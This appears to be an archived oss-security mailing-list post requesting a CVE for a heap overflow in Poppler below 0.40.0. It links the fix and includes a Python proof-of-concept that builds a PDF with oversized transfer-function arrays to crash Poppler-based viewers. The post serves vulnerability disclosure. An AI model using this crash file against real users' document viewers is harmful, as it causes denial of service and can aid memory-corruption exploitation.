Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 11 Apr 2016 20:52:27 -0300
From: Felipe <felipe.andres.manzano@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request: Poppler < 0.40.0

This is a clean heap overflow. Lib is used in evince and okular and for
preview in nautilus. Versions pre 0.40.0 are vulnerable.

The patch:
https://cgit.freedesktop.org/poppler/poppler/commit/?id=b3425dd3261679958cd56c0f71995c15d2124433


A crashy pdf file is attached.

PoC.py
from miniPDF.miniPDF import *
#from miniPDF.miniPDFO import *
import zlib
#The document
doc = PDFDoc()

#font
font = PDFDict()
font.add("Name", PDFName("F1"))
font.add("Subtype", PDFName("Type1"))
font.add("BaseFont", PDFName("Helvetica"))

#name:font map
fontname = PDFDict()
fontname.add("F1",font)

#resources
resources = PDFDict()
resources.add("Font",fontname)


data = '''BT /F1 24 Tf 240 700 Td (Pedefe Pedefeito
endstream
endobj
obj 1 0
99
endobj
Pedefeon!) Tj
ET /GS3 gs'''
#contents
contentsDict = PDFDict()
contents= PDFStream({},data)


length = PDFNum(len(data))
doc.add(length)
contents.add('Length',PDFRef(length))
#page
page = PDFDict()
page.add("Type",PDFName("Page"))
page.add("Resources",resources)
page.add("Contents", PDFRef(contents))

#pages
pages = PDFDict()
pages.add("Type", PDFName("Pages"))
pages.add("Kids", PDFArray([PDFRef(page)]))
pages.add("Count", PDFNum(1))

#add parent reference in page
page.add("Parent",PDFRef(pages))


#catalog
catalog = PDFDict()
catalog.add("Type", PDFName("Catalog"))
catalog.add("Pages", PDFRef(pages))

doc.add([catalog,pages,page,contents])
doc.setRoot(catalog)


#The Function thing
function = PDFDict()
function.add("FunctionType",PDFNum(2))
function.add("Domain",PDFArray([0,1]))
function.add("N",PDFNum(100))
#2261634.5098039214
size = 10000000
function.add("C0",PDFArray([2261634.5098039214]*size))
function.add("C1",PDFArray([2261634.5098039214]*size))


extgstate = PDFDict()
extgstate.add("Type",PDFName("ExtGState"))
extgstate.add("TR",function)

resources.add("ExtGState","<< /GS3 "+str(extgstate)+">>")

print doc

[ CONTENT OF TYPE text/html SKIPPED ]

[ CONTENT OF TYPE application/x-gzip SKIPPED ]

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ